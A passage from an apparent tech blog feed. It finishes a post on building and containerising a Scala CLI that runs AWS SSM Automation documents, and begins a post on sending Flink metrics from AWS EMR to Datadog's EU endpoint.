&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-scala" data-lang="scala">&lt;span class="k">private&lt;/span> &lt;span class="k">def&lt;/span> &lt;span class="n">process&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">params&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">util.ArrayList&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>&lt;span class="o">])&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">util.Map&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>, &lt;span class="kt">util.List&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="kt">String&lt;/span>&lt;span class="o">]]&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="n">params&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">asScala&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">map&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="k">_&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">split&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="sc">&amp;#39;=&amp;#39;&lt;/span>&lt;span class="o">))&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">collect&lt;/span> &lt;span class="o">{&lt;/span> &lt;span class="k">case&lt;/span> &lt;span class="nc">Array&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">key&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">value&lt;/span>&lt;span class="o">)&lt;/span> &lt;span class="k">=&amp;gt;&lt;/span> &lt;span class="n">key&lt;/span> &lt;span class="o">-&amp;gt;&lt;/span> &lt;span class="n">value&lt;/span> &lt;span class="o">}&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">groupBy&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="k">_&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">_1&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="o">.&lt;/span>&lt;span class="n">mapValues&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="k">_&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">map&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="k">_&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">_2&lt;/span>&lt;span class="o">).&lt;/span>&lt;span class="n">asJava&lt;/span>&lt;span class="o">).&lt;/span>&lt;span class="n">asJava&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Finally, I constructed the below method which utilized the &lt;code>SsmAutomationHelper&lt;/code> class from the utils module and passed the two variables provided by &lt;code>picocli&lt;/code> to it so it would invoke the necessary Automation Document and wait to retrieve its result via the &lt;code>Await&lt;/code> mechanism of Scala:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-scala" data-lang="scala">&lt;span class="k">def&lt;/span> &lt;span class="n">call&lt;/span>&lt;span class="o">()&lt;/span>&lt;span class="k">:&lt;/span> &lt;span class="kt">Unit&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="k">val&lt;/span> &lt;span class="n">conf&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="nc">ConfigFactory&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">load&lt;/span>&lt;span class="o">()&lt;/span>
&lt;span class="k">val&lt;/span> &lt;span class="n">inputParams&lt;/span> &lt;span class="k">=&lt;/span> &lt;span class="n">process&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">parameters&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="nc">Await&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">result&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="nc">SsmAutomationHelper&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">newInstance&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">conf&lt;/span>&lt;span class="o">).&lt;/span>&lt;span class="n">runDocumentWithParameters&lt;/span>&lt;span class="o">(&lt;/span>&lt;span class="n">documentName&lt;/span>&lt;span class="o">,&lt;/span> &lt;span class="n">inputParams&lt;/span>&lt;span class="o">),&lt;/span> &lt;span class="mf">10.&lt;/span>&lt;span class="n">minutes&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="packaging-the-cli-app">Packaging the CLI app&lt;/h2>
&lt;p>At this point I was ready with the CLI app and wanted to run it to see how it would function. Before I could run it, I needed to figure out how to package it all into a &lt;code>fat&lt;/code> JAR file with all needed dependencies, so that it could be invoked with CLI arguments. I googled around a bit and quickly found the
&lt;a href="https://docs.spring.io/spring-boot/docs/1.5.x/maven-plugin/repackage-mojo.html" target="_blank" rel="noopener">spring-boot-maven-plugin&lt;/a> which has the &lt;code>repackage&lt;/code> goal that&amp;rsquo;s just what I needed:&lt;/p>
&lt;blockquote>
&lt;p>Repackages existing JAR and WAR archives so that they can be executed from the command line using java -jar. With layout=NONE can also be used simply to package a JAR with nested dependencies (and no main class, so not executable).&lt;/p>
&lt;/blockquote>
&lt;p>I only had to add the below lines to my project&amp;rsquo;s &lt;strong>pom.xml&lt;/strong>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-xml" data-lang="xml">&lt;span class="nt">&amp;lt;plugin&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;groupId&amp;gt;&lt;/span>org.springframework.boot&lt;span class="nt">&amp;lt;/groupId&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;artifactId&amp;gt;&lt;/span>spring-boot-maven-plugin&lt;span class="nt">&amp;lt;/artifactId&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;version&amp;gt;&lt;/span>2.3.2.RELEASE&lt;span class="nt">&amp;lt;/version&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;configuration&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;layout&amp;gt;&lt;/span>JAR&lt;span class="nt">&amp;lt;/layout&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/configuration&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;executions&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;execution&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;goals&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;goal&amp;gt;&lt;/span>repackage&lt;span class="nt">&amp;lt;/goal&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/goals&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/execution&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/executions&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/plugin&amp;gt;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next I just had to run the &lt;code>mvn package&lt;/code> command, which invokes the plugin to builds the &lt;code>fat&lt;/code> JAR.&lt;/p>
&lt;h2 id="running-the-cli-app">Running the CLI app&lt;/h2>
&lt;p>Once the JAR is available, it can be used via the &lt;code>java -jar ...&lt;/code> command with extra arguments to run the any Automation Document such as &lt;code>AWS-StartEC2Instance&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">$ ▶ java -jar ./target/scala-cli-app-1.0.0.jar --document&lt;span class="o">=&lt;/span>AWS-StartEC2Instance &lt;span class="nv">InstanceId&lt;/span>&lt;span class="o">=&lt;/span>i-0ed4574c5ba94c877 &lt;span class="nv">AutomationAssumeRole&lt;/span>&lt;span class="o">=&lt;/span>arn:aws:iam::&lt;span class="o">{{&lt;/span>global:ACCOUNT_ID&lt;span class="o">}}&lt;/span>:role/AutomationServiceRole
15:24:41.998 &lt;span class="o">[&lt;/span>main&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Going to kick off SSM orchestration document: AWS-StartEC2Instance
15:24:42.773 &lt;span class="o">[&lt;/span>ForkJoinPool-1-worker-29&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Execution id: &amp;lt;...&amp;gt;
15:24:42.882 &lt;span class="o">[&lt;/span>ForkJoinPool-1-worker-11&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Current status: &lt;span class="o">[&lt;/span>InProgress&lt;span class="o">]&lt;/span>, retry counter: &lt;span class="c1">#0&lt;/span>
&lt;span class="o">[&lt;/span>...&lt;span class="o">]&lt;/span>
15:28:01.226 &lt;span class="o">[&lt;/span>ForkJoinPool-1-worker-11&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Current status: &lt;span class="o">[&lt;/span>InProgress&lt;span class="o">]&lt;/span>, retry counter: &lt;span class="c1">#21&lt;/span>
15:28:16.442 &lt;span class="o">[&lt;/span>ForkJoinPool-1-worker-11&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Execution finished with final status: &lt;span class="o">[&lt;/span>Success&lt;span class="o">]&lt;/span>
15:28:16.444 &lt;span class="o">[&lt;/span>main&lt;span class="o">]&lt;/span> INFO com.flrnks.app.SsmCliParser :: SSM execution run took &lt;span class="m">215&lt;/span> seconds
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Seems to be working quite well!&lt;/p>
&lt;h2 id="bonus-running-in-a-container">Bonus: running in a container&lt;/h2>
&lt;p>I thought I would take the above one step further and package the JAR into a java based docker container. This would allow me to forget about the syntax of the java command that I previously used to run the app. Instead, I can hide it in a very minimal Dockerfile:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-dockerfile" data-lang="dockerfile">&lt;span class="k">FROM&lt;/span>&lt;span class="s"> openjdk:8-jdk-alpine&lt;/span>&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">MAINTAINER&lt;/span>&lt;span class="s"> flrnks &amp;lt;flrnks@flrnks.netlify.com&amp;gt;&lt;/span>&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">ADD&lt;/span> target/scala-cli-app-1.0.0.jar /usr/share/backend/app.jar&lt;span class="err">
&lt;/span>&lt;span class="err">&lt;/span>&lt;span class="k">ENTRYPOINT&lt;/span> &lt;span class="p">[&lt;/span> &lt;span class="s2">&amp;#34;/usr/bin/java&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s2">&amp;#34;-jar&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s2">&amp;#34;/usr/share/backend/app.jar&amp;#34;&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="err">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The &lt;code>mvn package&lt;/code> command which is used to build the fat JAR will save it into the &lt;strong>/target&lt;/strong> subdirectory, so one can put this Dockerfile into the project&amp;rsquo;s root and then manually build the docker image by running &lt;code>docker build -t ssmcli .&lt;/code>. This will create an image called &lt;strong>ssmcli&lt;/strong> without issues, however I&amp;rsquo;ve found an awesome plugin called &lt;code>dockerfile-maven-plugin&lt;/code> built by
&lt;a href="https://github.com/spotify/dockerfile-maven" target="_blank" rel="noopener">Spotify&lt;/a> which can automagically take this Dockerfile and turn it into an image based on the plugin configuration:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-xml" data-lang="xml">&lt;span class="nt">&amp;lt;plugin&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;groupId&amp;gt;&lt;/span>com.spotify&lt;span class="nt">&amp;lt;/groupId&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;artifactId&amp;gt;&lt;/span>dockerfile-maven-plugin&lt;span class="nt">&amp;lt;/artifactId&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;version&amp;gt;&lt;/span>1.4.10&lt;span class="nt">&amp;lt;/version&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;executions&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;execution&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;id&amp;gt;&lt;/span>default&lt;span class="nt">&amp;lt;/id&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;goals&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;goal&amp;gt;&lt;/span>build&lt;span class="nt">&amp;lt;/goal&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/goals&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;configuration&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;repository&amp;gt;&lt;/span>flrnks/ssmcli&lt;span class="nt">&amp;lt;/repository&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;tag&amp;gt;&lt;/span>latest&lt;span class="nt">&amp;lt;/tag&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/configuration&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/execution&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/executions&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;/plugin&amp;gt;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This plugin hooks into the &lt;code>mvn package&lt;/code> goal and when it&amp;rsquo;s executed it will automatically create the docker image:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> --- spring-boot-maven-plugin:2.3.2.RELEASE:repackage &lt;span class="o">(&lt;/span>default&lt;span class="o">)&lt;/span> @ scala-cli-app ---
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Layout: JAR
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Replacing main artifact with repackaged archive
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span>
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> --- dockerfile-maven-plugin:1.4.10:build &lt;span class="o">(&lt;/span>default&lt;span class="o">)&lt;/span> @ scala-cli-app ---
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> dockerfile: null
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> contextDirectory: /Users/flszabo/Desktop/personal-wrkspc/scala/scala-cli-app
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Building Docker context /Users/flszabo/Desktop/personal-wrkspc/scala/scala-cli-app
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Path&lt;span class="o">(&lt;/span>dockerfile&lt;span class="o">)&lt;/span>: null
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Path&lt;span class="o">(&lt;/span>contextDirectory&lt;span class="o">)&lt;/span>: /Users/flszabo/Desktop/personal-wrkspc/scala/scala-cli-app
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span>
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Image will be built as flrnks/ssmcli:latest
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Step 1/4 : FROM openjdk:8-jdk-alpine
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Pulling from library/openjdk
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Digest: sha256:94792824df2df33402f201713f932b58cb9de94a0cd524164a0f2283343547b3
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Status: Image is up to date &lt;span class="k">for&lt;/span> openjdk:8-jdk-alpine
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> ---&amp;gt; a3562aa0b991
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Step 2/4 : MAINTAINER flrnks &amp;lt;flrnks@flrnks.netlify.com&amp;gt;
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> ---&amp;gt; Using cache
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> ---&amp;gt; efcc673b4f35
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Step 3/4 : ADD target/scala-cli-app-1.0.0.jar /usr/share/backend/app.jar
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> ---&amp;gt; 8b2cf76f03c2
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Step 4/4 : ENTRYPOINT &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;/usr/bin/java&amp;#34;&lt;/span>, &lt;span class="s2">&amp;#34;-jar&amp;#34;&lt;/span>, &lt;span class="s2">&amp;#34;/usr/share/backend/app.jar&amp;#34;&lt;/span>&lt;span class="o">]&lt;/span>
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> ---&amp;gt; Running in c9633237f9fa
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Removing intermediate container c9633237f9fa
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> ---&amp;gt; 6db69aa30fb1
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Successfully built 6db69aa30fb1
&lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> Successfully tagged flrnks/ssmcli:latest
&lt;/code>&lt;/pre>&lt;/div>&lt;p>To test this new docker image I ran the &lt;code>AWS-StopEC2Instance&lt;/code> Automation Document and specified the same CLI arguments as before, thanks to the &lt;code>ENTRYPOINT&lt;/code> configuration in the Dockerfile. As an extra step I needed to share the AWS profile with the docker container at runtime by using the flag &lt;code>-v ~/.aws:/root/.aws&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">$ ▶ ddocker run --rm -v ~/.aws:/root/.aws flrnks/ssmcli --document&lt;span class="o">=&lt;/span>AWS-StopEC2Instance &lt;span class="nv">InstanceId&lt;/span>&lt;span class="o">=&lt;/span>i-0ed4574c5ba94c877 &lt;span class="nv">AutomationAssumeRole&lt;/span>&lt;span class="o">=&lt;/span>arn:aws:iam::&lt;span class="o">{{&lt;/span>global:ACCOUNT_ID&lt;span class="o">}}&lt;/span>:role/AutomationServiceRole
17:18:59.541 &lt;span class="o">[&lt;/span>main&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Going to kick off SSM orchestration document: AWS-StopEC2Instance
17:19:00.789 &lt;span class="o">[&lt;/span>ForkJoinPool-1-worker-13&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Execution id: &amp;lt;...&amp;gt;
17:19:00.966 &lt;span class="o">[&lt;/span>ForkJoinPool-1-worker-11&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Current status: &lt;span class="o">[&lt;/span>InProgress&lt;span class="o">]&lt;/span>, retry counter: &lt;span class="c1">#0&lt;/span>
17:19:03.564 &lt;span class="o">[&lt;/span>ForkJoinPool-1-worker-11&lt;span class="o">]&lt;/span> INFO c.f.utils.ssm.SsmAutomationHelper :: Execution finished with final status: &lt;span class="o">[&lt;/span>Success&lt;span class="o">]&lt;/span>
17:19:03.568 &lt;span class="o">[&lt;/span>main&lt;span class="o">]&lt;/span> INFO com.flrnks.app.SsmCliParser :: SSM execution run took &lt;span class="m">5&lt;/span> seconds
&lt;/code>&lt;/pre>&lt;/div>&lt;p>One may say that typing that long &lt;code>docker run ...&lt;/code> command above takes longer than typing &lt;code>java -jar ./target/scala-cli-app-1.0.0.jar ...&lt;/code> but I would argue that running it inside a docker container has its valid use-cases as well. It allows for controlled setup of the runtime environment and prevents dependency issues too!&lt;/p>
&lt;h2 id="conclusion">Conclusion&lt;/h2>
&lt;p>This project has allowed me to learn much more than I initially expected. I learnt a lot about Scala, which was the original goal, but I also gained valuable experience with Maven, its plugin ecosystem and of course with Java as well. I hope whoever reads this post will find something useful in it too!&lt;/p></description></item><item><title>Monitoring Flink on AWS EMR</title><link>https://flrnks.netlify.app/post/emr-flink-datadog/</link><pubDate>Sun, 16 Aug 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/emr-flink-datadog/</guid><description>&lt;h2 id="brief-intro">Brief intro&lt;/h2>
&lt;p>This is going to be a somewhat unusual post on this blog. It is about a problem I recently encountered while trying to improve the monitoring of a long-running Flink cluster we have on AWS EMR, following the official
&lt;a href="https://docs.datadoghq.com/integrations/flink/" target="_blank" rel="noopener">documentation&lt;/a> from Datadog.&lt;/p>
&lt;h2 id="the-emr-setup">The EMR setup&lt;/h2>
&lt;p>Our EMR cluster consumes 4 Kinesis Data Streams which are used to send s3 files in AVRO format for processing. When a new file arrives, the Flink job will fetch it from S3, do some validation and filtering and then convert it to ORC format and save it to a new location on s3. In early June we experienced a failure in one of the Flink jobs consuming a production stream. Sadly we did not have adequate monitoring set up to detect this on time. We only learnt about it when we noticed that data in the output bucket was missing for certain dates. Our streams were configured with the maximum retention period of 7 days. By the time we noticed the missing data in the stream was already piling up, and the oldest was close to half of this retention period. By the time we managed to find the root cause and deploy the fix to the Flink job, it was too late, and some data had already expired from the stream.&lt;/p>
&lt;p>The existing monitoring solution was implemented via AWS Lambda functions running every 8 hours. These functions were making Athena queries to check if any data arrived to the S3 bucket during the last 48 hours. The problem with this was approach was that we do not get alerts about missing data for up to 2 days because of the way our query used a sliding window of 2 days.&lt;/p>
&lt;p>The Flink cluster runs in a private VPC, so reaching the Flink Web UI to check the status of the jobs was quite difficult to say the least. We either had to set up an SSH port forwarding session and use a FoxyProxy setup in Firefox, or set up a personal VM the same private VPC via the AWS WorkSpaces managed service and then connect from that VM&amp;rsquo;s browser to the cluster&amp;rsquo;s Flink UI. Either way it was quite cumbersome and still a manual process to connect to the Flink UI to check the cluster health. I wanted an automated way of gathering metrics and alerting if something went wrong, so I looked into how Flink could be monitored by Datadog.&lt;/p>
&lt;h2 id="datadog--flink">Datadog ❤️ Flink&lt;/h2>
&lt;p>A quick Google search threw up the official documentation from Datadog where I found really straightforward instructions on enabling the submission of Flink metrics to Datadog, which could be instantly visualized in their default Flink dashboard. These main steps are:&lt;/p>
&lt;ul>
&lt;li>adding some new parameters to the flink-conf.yaml, such as the Datadog API/APP keys and custom tags&lt;/li>
&lt;li>copying the &lt;code>flink-datadog-metrics.jar&lt;/code> to the active flink installation path&lt;/li>
&lt;/ul>
&lt;p>The first step was quite easy. Our cluster was defined in Cloudformation where we used &lt;code>AWS::EMR::Cluster&lt;/code> which allows specifying the flink-conf.yaml content as below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yaml" data-lang="yaml">&lt;span class="k">Cluster&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Type&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>AWS&lt;span class="p">::&lt;/span>EMR&lt;span class="p">::&lt;/span>Cluster&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Properties&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Name&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>Flink-Cluster&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Configurations&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- &lt;span class="k">Classification&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>flink-conf&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">ConfigurationProperties&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">metrics.reporter.dghttp.class&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>org.apache.flink.metrics.datadog.DatadogHttpReporter&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">metrics.reporter.dghttp.apikey&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="s1">&amp;#39;{{resolve:secretsmanager:datadog/api_key:SecretString}}&amp;#39;&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">metrics.reporter.dghttp.tags&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>name&lt;span class="p">:&lt;/span>flink-cluster&lt;span class="p">,&lt;/span>&lt;span class="w"> &lt;/span>app&lt;span class="p">:&lt;/span>flink-cluster&lt;span class="p">,&lt;/span>&lt;span class="w"> &lt;/span>region&lt;span class="p">:&lt;/span>eu-central&lt;span class="m">-1&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="w"> &lt;/span>env&lt;span class="p">:&lt;/span>prod&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="p">[&lt;/span>...&lt;span class="p">]&lt;/span>&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The above CF snippet shows just the 3 most important lines of the &lt;strong>flink-conf.yaml&lt;/strong>: (1) the full package name of the java class which implements the metric submission, (2) the Datadog API key loaded from AWS Secrets Manager and (3) a few custom tags which will be added to metrics sent to Datadog.&lt;/p>
&lt;p>To copy the necessary datadog-metrics JAR where it would be loaded from (&lt;code>/usr/lib/flink/lib&lt;/code>), I added a new &lt;code>AWS::EMR::Step&lt;/code> to in CloudFormation which is executed only on the EMR Master Node in order to activate Datadog monitoring on the cluster via the supplied Java class and API key in the &lt;strong>flink-conf.yaml&lt;/strong>.&lt;/p>
&lt;p>To test that it was working properly I just needed to redeploy the cluster which was surprisingly easy thanks to the Cloudformation setup we had in place. But something was still not right.&lt;/p>
&lt;h2 id="know-your-continent">Know your continent&lt;/h2>
&lt;p>After redeploying the cluster I waited and waited and waited a bit more but metrics were not showing up in the Flink dashboard. So I got in touch with Datadog support who were very helpful in figuring out what the issue was. After a few rounds of emails back and forth we quickly discovered why the metrics were not showing up.&lt;/p>
&lt;p>The reason was that we had our Datadog account set up in the EU region and not in the USA. Thus, all our metrics were supposed to flow to the EU endpoint at &lt;code>app.datadoghq.eu/api/&lt;/code> instead of the USA endpoint at &lt;code>app.datadoghq.com/api/&lt;/code>. The difference is quite subtle, only a simple change in the TLD from &lt;strong>.com&lt;/strong> to &lt;strong>.eu&lt;/strong>. The catch was that our EMR cluster was running Flink 1.9.1 (provided by the EMR release 5.29.0) which had this API endpoint hardcoded, pointing to the USA data centre. The Datadog Support Engineer uncovered some extra
&lt;a href="https://ci.apache.org/projects/flink/flink-docs-stable/monitoring/metrics.html#datadog-orgapacheflinkmetricsdatadogdatadoghttpreporter" target="_blank" rel="noopener">instructions&lt;/a> on how this can be solved by adding an extra line to the &lt;strong>flink-conf.yaml&lt;/strong> to change the default US region to the EU instead:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yaml" data-lang="yaml">&lt;span class="k">Cluster&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Type&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>AWS&lt;span class="p">::&lt;/span>EMR&lt;span class="p">::&lt;/span>Cluster&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Properties&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Name&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>Flink-Cluster&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="p">[&lt;/span>...&lt;span class="p">]&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">Configurations&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>- &lt;span class="k">Classification&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>flink-conf&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">ConfigurationProperties&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="p">[&lt;/span>...&lt;span class="p">]&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">metrics.reporter.dghttp.class&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>org.apache.flink.metrics.datadog.DatadogHttpReporter&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">metrics.reporter.dghttp.apikey&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="s1">&amp;#39;{{resolve:secretsmanager:datadog/api_key:SecretString}}&amp;#39;&lt;/span>&lt;span class="w">
